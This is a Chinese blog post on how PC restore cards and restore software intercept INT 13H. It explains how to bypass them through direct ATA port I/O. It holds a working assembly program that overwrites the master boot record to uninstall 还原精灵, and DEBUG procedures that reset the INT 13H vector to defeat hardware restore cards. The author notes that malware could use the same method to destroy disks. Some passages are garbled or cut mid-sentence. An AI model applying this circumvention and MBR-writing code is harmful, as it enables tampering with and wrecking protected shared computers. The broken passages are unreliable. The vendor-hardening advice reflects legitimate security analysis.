还原卡还原精灵原理

还原卡还原精灵原理 猪头4的BLOG 还原卡的工作原理是什么, 一种可以穿透还原卡和还原软件的代码 还原卡和还原软件被广泛运用于各种公共场合的电脑上，比如学校机房和网吧。这些还原卡和还原软件(以下我简称为虚拟还原技术)能够记 录下一切对硬盘的写操作，不论您对硬盘进行拷贝还是移动删除甚至是格式化分区等操作，只要一重新启动，一切都会恢复到这个操作之前的 情况，因此有些虚拟还原厂商还会在广告词中加上一句“可以防范一切电脑病毒”。这种虚拟还原的方法在大部分时候的确可以对公共机房的 电脑起到很好的保护作用，难道真的没有一种方法能够穿透这种保护机制么,是否定的，下面请听我一一道来。 一、虚拟还原技术的原理 本文所说的是一种普遍运用于还原卡或还原软件上的技术，当然，不同品牌不同厂商生产的可能不尽相同，但原理却是相通的。 首先，还原卡和还原软件会抢先夺取引导权，将原来的0头0道1扇保存在一个其他的扇区，(具体备份到那个扇区是不一定的)，将自己的代码 写入0头0道1扇，从而能在操作系统之前得到执行权，这一点类似于一个引导型病毒;然后，我们来看看虚拟还原技术在操作系统之前都做了些 什么: 1(将中断向量中的INT13H的入口地址保存; 2(把自己用于代替INT13H的代码写入内存，并记住入口地址，当然这种“写入内存”并不是普通的“写”，而是一种我们称为“常驻”的方法 ，有关“常驻程序”的实现方法我们不另外花篇幅来描述了，如果你还不了解的话请自己找有关资料，也可以到[url]www.hackart.org[/url] 或[url]www.lsky.net[/url]找风般的男人交流; 3(将中断向量表中INT13H的入口地址改为这段常驻程序的入口地址。补充一点，虚拟还原程序在修改INT13H的入口后往往都会修改一些其他中 断入口，当然也是通过常驻程序来实现的，这些中断用来实现对中断向量表中INT13H入口地址监控，一旦发现被修改，就马上把它改回，这样 做同样是用来防止被有心人破解。 好了，你已经看出来了，这段用来替代BIOS提供的INT13H的代码才是虚拟还原技术的关键，那么这段代码到底实现了些什么了，以下是本人对 此拙浅的理解: 1(拦截所有INT13H中对硬盘0头0道1扇的操作 这些包括读写操作，把所有的对0头0道1扇的操作改为对虚拟还原程序备份的那个扇区的操作，这样做的目的是保护虚拟还原代码不被破坏，并 且不能被有心人读出进行破解，即使你用扇区编辑工具查看主引导区，实际上你看到的是这个备份的主引导区。 2(拦截所有INT13H中的写硬盘操作 这里包括对8G以下的硬盘的普通通过磁头、磁道、扇区定位的INT13H中的写操作，和扩展INT13H中基于扇区地址方式的对大硬盘的写操作，甚 至包括扩展INT13H中对一些非IDE接口的硬盘的写操作。 至于拦截后做什么是虚拟还原技术实现的关键，在早期的DOS系统当中完全可以“什么都不做”，也就是说当用户写硬盘时实际上是什么都没做 ，但现在的操作系统都要对硬盘进行一些必要的写操作，比如对虚拟内存的写操作。众所周知，虚拟内存实际上就是硬盘，而如果禁止操作系 统写硬盘的话显然后果是不堪设想的。所以，大多数虚拟还原厂商用的方法是占用一些硬盘空间，把硬盘所进行的写操作做一个记录，等系统 重新启动后还原这一记录，但是怎样科学记录硬盘的写操作，是我一直没想通的问题，这种“科学”应该体现在时间上和硬盘空间的占用量上 的，也就是说怎么样用最少的时间和最少的硬盘空间来记录硬盘的写操作是实现关键，如果有这方面想法的朋友欢迎和我交流; ，71H中的，并把最后一次执行时端口70H，71H的内容和3(备份端口70H 备份的内容做比较，不一样就提示BIOS被修改，是否还原，并通过 密码验证修改BIOS是否合法。 二、PC机的中断机制 中断提供了最基本的硬件和软件的接口，它使得程序员不必了解硬件系统的细节，只要直接调用系统提供的中断服务子程序，就可以完成相应 功能，这样能使得程序更为方便。其实现机制如下:当某一中断源发出中断请求时，CPU能够决定是否响应这一中断请求(当CPU在执行更 为重要的工作时，可以暂不响应)，如果允许响应该中断，CPU会在现行的指令执行完后，把断点处的下一条指令地址和各寄存器的内容和标志 位的状态，推入堆栈进行保护，然后转到中断源服务程序的入口，进行中断处理，当中断处理完成后，再恢复被保留的各寄存器、标志位状态 和指令指针，使CPU返回断点，继续执行下一条指令。 为了区别各个中断，CPC系统给每个中断都分配了一个中断号N，比如INT 3H是断点中断，INT 10H是显示中断，我们今天要讨论的主要是INT 13H磁盘读写中断。 要说清楚PC机上的中断机制，用这一点篇幅是完全不够的，这里我所说的只是一个大概，如果你不清楚的话，请查阅一些资料或和我交流，我 们今天重要要说的就是以INT13H为例看看BIOS提供给我们的中断到底都是在做什么,所谓BIOS中断简单说就是你机器上的BIOS提供的中断，那 么在BIOS中断的后面，到底是些什么呢,实际上是一些对端口的输入输出操作，PC的每个端口都实现特定的功能，我们完全可以不调用BIOS提 供的中断而直接用输入输出指令对这些端口进行操作，从而可以实现象调用BIOS中断一样的功能，但是一个前提是你必须对这些端口有详细的 了解。反过来说，PC的中断系统的一大好处就是能够让程序员无须了解系统底层的硬件知识的而能够编程，从这点看，中断有点象我们平时所 说的“封装”，我不知道这样说对不对，但的确中断为我们“封装”了许多系统底层的细节。 三、硬盘读写端口的具体含义 对硬盘进行操作的常用端口是1f0h~1f7h号端口，各端口含义如下: 端口号 读还是写 具体含义 1F0H 读/写用来传送读/写的数据(其内容是正在传输的一个字节的数据) 1F1H 读 用来读取错误码 1F2H 读/写 用来放入要读写的扇区数量 1F3H 读/写 用来放入要读写的扇区号码 1F4H 读/写 用来存放读写柱面的低8位字节 1F5H 读/写 用来存放读写柱面的高2位字节(其高6位恒为0) 1F6H 读/写 用来存放要读/写的磁盘号及磁头号 第7位 恒为1 第6位 恒为0 第5位 恒为1 第4位 为0代表第一块硬盘、为1代表第二块硬盘 第3~0位 用来存放要读/写的磁头号 1f7H 读 用来存放读操作后的状态 第7位 控制器忙碌 第6位 磁盘驱动器准备好了 第5位 写入错误 第4位 搜索完成 第3位 为1时扇区缓冲区没有准备好 第2位 是否正确读取磁盘数据 第1位 磁盘每转一周将此位设为1, 第0位 之前的命令因发生错误而结束 写 该位端口为命令端口,用来发出指定命令 为50h 格式化磁道 为20h 尝试读取扇区 为21h 无须验证扇区是否准备好而直接读扇区 尝试读取长扇区(用于早期的硬盘,每扇可能不是512字节,而是128字为22h 节到1024之间的值) 为23h 无须验证扇区是否准备好而直接读长扇区 为30h 尝试写扇区 为31h 无须验证扇区是否准备好而直接写扇区 为32h 尝试写长扇区 为33h 无须验证扇区是否准备好而直接写长扇区 注:当然看完这个表你会发现，这种读写端口的方法其实是基于磁头、柱面、扇区的硬盘读写方法，不过大于8G的硬盘的读写方法也是通过端口 1F0H~1F7H来实现的' 四、一个通过对硬盘输入输出端口操作来读写硬盘的实例 让我们来看一个关于INT13H读写硬盘程序实例。在例子中详细说明了硬盘的读写操作所用到的端口，并且把通过INT13H读出的主引导区得到的 数据和通过输入输出读主引导区得到的数据进行比较，从而证实这两种操作功能相同，程序片段如下: mov dx,1f6h ; 要读入的磁盘号及磁头号 mov al,0a0h ;磁盘0,磁头0 out dx,al mov dx,1f2h ;要读入的扇区数量 mov al,1 ;读一个扇区 out dx,al mov dx,1f3h ;要读的扇区号 mov al,1 ;扇区号为1 out dx,al mov dx,1f4h ;要读的柱面的低8位 mov al,0 ; 柱面低8位为0 out dx,al mov dx,1f5h ; 柱面高2位 mov al,0 ; 柱面高2位为0(通过1F4H和1F5H端口我们可以确定 ; 用来读的柱面号是0) out dx,al mov dx,1f7h ;命令端口 mov al,20h ; 尝试读取扇区 out dx,al still_going: in al,dx test al,8 ;扇区缓冲是否准备好 jz still_going ;如果扇区缓冲没有准备好的话则跳转，直到准备好才向下执 行。 mov cx,512/2 ;设置循环次数(512/2次) mov di,offset buffer mov dx,1f0h ;将要传输的一个字节的数据 rep insw ;传输数据 ; ------ mov ax,201h ;以下是用INT13H读硬盘的0磁头、0柱面、1扇区 mov dx,80h mov cx,1 mov bx,offset buffer2 int 13h mov cx,512 ;以下部分用来比较2种方法读出的硬盘数据 mov si,offset buffer mov di,offset buffer2 repe cmpsb jne failure mov ah,9 mov dx,offset readmsg int 21h jmp good_exit failure: mov ah,9 mov dx,offset failmsg int 21h good_exit: ;以下部分用来结束程序 mov ax,4c00h ;退出程序 int 21h readmsg db 'The buffers match. Hard disk read using ports.$' failmsg db 'The buffers do not match.$' buffer db 512 dup ('V') buffer2 db 512 dup ('L') 五、可以穿透还原卡或是还原软件保护的代码 你可以对照硬盘读写端口含义表,再好好看看上面的例子,你将会对硬盘读写端口有一个比较深的理解。好了，到了该把谜底揭晓的时候了，重 新回到我们的主题。正如你现在想象的，这种可以穿透还原卡或是还原软件保护的代码的确是对硬盘读写端口的输入输出操作。现在，我们已 经可以从原理上理解了，还原卡拦截的是中断操作，但却拦截不了输入输出操作，而用输入输出操作足够可以对硬盘进行写操作了，当然用输 入输出操作也完全可以读到被虚拟还原程序屏蔽的关键部分，被还原卡或是还原软件屏蔽的0头0道1扇。知道了这一原理以后，可能是仁者见仁 智者见智的，如果你是一个虚拟还原技术的破解者、一个病毒制造者，或是虚拟还原技术的设计者，往往对此的理解都是不尽相同的。 在此强调我不赞成制造病毒，但一个病毒制造者完全可以用此原理写出一个可以实现破坏装有还原卡或还原软件的机器了，所以我要提醒虚拟 还原用户的是，不要以为装有还原卡或是还原软件就掉以轻心，要知道世界上还是有病毒能够穿透虚拟还原技术的保护，达到破坏硬盘的目的 的，想象一下如果把这一原理运用到CIH病毒中，或者运用到硬盘杀手病毒中，其后果是不堪设想的。 谈谈如何用这种可以穿透虚拟还原技术的代码来破解还原软件(如还原精灵)吧。以下是我写的用来测试破解还原精灵的代码，本代码编译后 的程序需要在纯DOS环境执行，在DOS下我用这段代码成功的把还原精灵给卸载了。 .286 CODE SEGMENT ASSUME CS:CODE,DS:code,ES:code START: ;---------------------------------------------------------- ;以下代码用INT13H读主引导区 mov ax,0201h mov dx,0080h mov cx,0001h mov bx,7c00h int 13h ;--------------------------------------------------------- ;以下代码用I/O端口来写主引导区 mov dx,1f6h ; 要读入的磁盘号及磁头号 磁头0 mov al,0a0h ; 磁盘0, out dx,al mov dx,1f2h ; 要写的扇区数量 mov al,1 ; 写一个扇区 out dx,al mov dx,1f3h ;要写的扇区号 mov al,1 ;写到1扇区 out dx,al mov dx,1f4h ; 要写的柱面的低8位 mov al,0 ; 低8位为0 out dx,al mov dx,1f5h ; 要写的柱面的高2位 mov al,0 ; 高2位为0 out dx,al mov dx,1f7h ;命令端口 mov al,30h ;尝试着写扇区. out dx,al oogle: in al,dx test al,8 ;磁盘扇区缓冲是否准备好 jz oogle mov cx,512/2 ;设置循环次数(512/2) mov si,7c00h mov dx,1f0h ;数据端口,用来存放要发送的数据. rep outsw ;发送数据. ; ------------------------------------------------------------------- ----------- ;退出程序 mov ah,4ch int 21 CODE ENDS END START 上面的程序非常简单，说明如下: 1、先把被还原精灵备份的原来的主引导区用INT13H读出来，这里虽然是对0头0道1扇进行读操作，但实际上是在读被还原精灵把原来的主引导 区备份进去的那个扇区; 2、把读出的原来的主引导区通过输入输出操作写进真正的主引导区，换句话说就是把还原精灵给彻底删除了，此时重新启动你将发现还原精灵 已经没有了。 我写了个FORWIN98/NT/XP的卸载还原精灵等软件的程序，大家可到[url][/url]下载，不过已经有?..任何的危险了。 用以上的方法要实现还原卡的破解可能是不行的，因为还原卡毕竟是硬件，它可以先于硬盘引导前执行，这样即使你写回了硬盘的主引导区， 还原卡还是可以把它写回的，但是，在破解还原卡的时候，完全可以利用文章中的原理，把还原卡写入硬盘主引导区的真正代码读出进行分析 ，甚至有些还原卡的密码就在这个扇区中。 对于还原卡和还原软件的制造者来说，如何让您制造的还原卡或还原软件更安全，可能是一个需要思考的问题。真心希望以后的还原卡或是还 原软件在拦截INT13H的同时也能拦截硬盘I/O操作。 在我安装还原精灵的时候看到一个选项是“防止硬盘I/O破坏”，开始还以为还原精灵在这方面做的不错，想到了从拦截I/O操作来保护硬盘。 可惜我错了，即使选择这一个选项，也同样可以通过输入输出端口操作来写硬盘。对于掌握了这种技术的人来说，这种还原卡或是还原软件可 以说是形同虚设。因此我认为，还原卡和还原软件不但要实现拦截所有硬盘写操作、拦截对主引导区的读写操作，更应该拦截对硬盘的读写端 口的操作，只有这样的虚拟还原技术才可能使基于硬盘的读写端口操作所对硬盘的破坏或是对虚拟还原技术的破解变成不可能。 硬盘还原卡的破解 本来以前就要写这一篇的，有事耽误了，现在写出来竽充数吧～ 还原卡也称硬盘保护卡，学校等单位采用较多，可以保护硬盘数据不被恶意修改，删除。保护卡是一种硬件芯片，插在主板上与硬盘的MBR协同 工作。在说明原理前，我想先提一种技术“BIOS映射地址搬移”。这种技术在前几年，大行其道，但均秘而不喧。诸位以前玩解密的时候可能 都用过龚成宾的SIMU97吧。它能在只读的BIOS地址区实现写入，因而能拦截到CALL F000:EC59等调用。这种调用在以软盘为载体的加密方案中 ，有重要意义,后来为了躲过它，王江民没办法使用了UPD765。不过，根据我的分析UPD765读写软盘时照样可以拦截。刚才提的那种拦截方式的 原理是这样的[跟踪所得]，通过调用Int15h子功能，其他方法也可以，只要能切入保护模式，切入保护模式后，改掉BIOS所在段的段描述符。 这种方法可以实现BIOS段的重定位，当然就可以让它可写入了。用Int13H读软盘时Int13H会调用F000:EC59,这是拦截Int13h 的一种高级手段。 其实围绕硬盘保护的加密解密关键就看谁拦截的位置更底层。但对与硬盘保护卡来说，只要恢复Int13的BIOS级中断向量就够了。具体如何破解 呢,找到Int13h的原始BIOS中断向量值，填入中断向量表。这样修改以后其他对Int13H 的钩子通常就被绕过了 [有些部份如果觉得简单请跳过 看 '] 下面是找Int13入口的方法，我常用的几种: 1。手工运行Debug,最好在纯DOS下: Debug - a100 - xor ax,ax 注意:前面要加上功能号以选择Int13H内部的，避免进入其他不经过原始入口的流程 - int 13 - int3 然后输入t回车，不断的重复，直到显示的地址形如 F000:xxxx。记下这一地址,按q 回车退出。这里假设了第一个F000:xxxx就是要找的入口， 实际上可以在第2，3，4，。。。。出现，要自己判断一下，通常认为就是第一个。 在(0:13H*4)=0:4cH 处填入这个地址。 例如得到的地址是F000:1234 运行debug -e 0:4c 34 12 00 F0 =======>把得到的原始入口填入Int13H的中断向量表 -q 注意: 填的时候要仔细，填错的话会死机。有些经过针对性处理的机器，要进一步鉴别。如在Int13内部调 用Int1ch. 如果在trace过程中发现 如下代码 CMP DL,80[意思是判断是否针对硬盘操作] ，可以尝试修改成不存在的硬盘号，比如改成CMP DL,FF。其他的都不要修改.试试 硬盘可写吗,如果可以的话就万事大吉了。另外，不能在Windows的虚拟DOS窗口中使用这种方法。如果在Windows的虚拟DOS窗口运行的话，请 使用下一种方法。 2。Debug - s F000:0 ffff 80 fa 80 强行搜索BIOS区，通过比较入口代码找到原始入口点 你可能会发现有好几处。根据我的多次破解经验，通常这个地址在F000:8000以后。试验一下: 如果U F000:xxxx地址后发现代码类似 -u F000:xxxx PUSHF CMP DL,80 JZ .... . . . [有些不是这样，要注意鉴别。] 的话，填入向量表试试。通常破解就完成了。